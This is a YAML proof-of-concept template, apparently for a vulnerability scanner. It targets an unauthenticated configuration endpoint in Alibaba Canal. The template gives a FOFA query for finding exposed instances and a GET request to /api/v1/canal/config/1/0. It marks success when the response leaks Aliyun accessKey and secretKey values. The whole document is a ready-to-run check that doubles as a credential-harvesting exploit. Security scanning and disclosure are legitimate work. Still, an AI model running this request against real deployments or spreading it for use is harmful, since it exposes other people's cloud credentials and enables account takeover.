product: Alibaba-Canal
vName: Alibaba-Canal v1-canal-config未授权访问
type: 访问控制
vID: [ ]
level: 2
vDesc: 由于/api/v1/canal/config未进行权限验证可直接访问，导致账户密码、accessKey、secretKey等一系列敏感信息泄漏
version: ''
note: ''
search:
  FOFA: app="Alibaba-Canal"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/Web应用漏洞/Alibaba Canal config 云密钥信息泄漏漏洞.md
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/v1/canal/config/1/0
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - aliyun.accessKey=
              - aliyun.secretKey=
            logic: and